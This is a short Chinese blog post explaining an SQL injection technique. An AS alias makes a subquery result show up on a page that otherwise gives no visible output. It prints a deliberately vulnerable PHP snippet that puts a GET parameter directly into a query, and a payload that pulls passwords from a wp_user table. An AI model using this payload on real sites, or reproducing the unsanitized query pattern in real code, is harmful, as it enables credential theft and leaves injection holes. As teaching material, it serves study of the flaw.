时间盲注——AS别名让盲注不盲

用处

页面存在时间盲注，注入成功了，你啥也看不到。
这只是为了能够查看到注入后的结果

网站部分源代码

<?php
$conn = mysqli_("127.0.0.1","root","root","test");
$res = mysqli_query($conn, "SELECT ${_GET['id']}, content FROM wp_news");
$row = mysqli_fetch_array($res);
echo "<h1>".$row["title"]."</h1>";
echo "<br>";
echo "<h1>".$row['content']."</h1>";
?>

注入语句

?id = (select pwd from wp_user) as title

原理

代码

echo "<h1>".$row["title"]."</h1>"

中的title，被你赋值成了注入语句的结果

posted @ 2020-12-16 12:54 Throokie 阅读(60) 评论(0) 编辑收藏举报

刷新页面返回顶部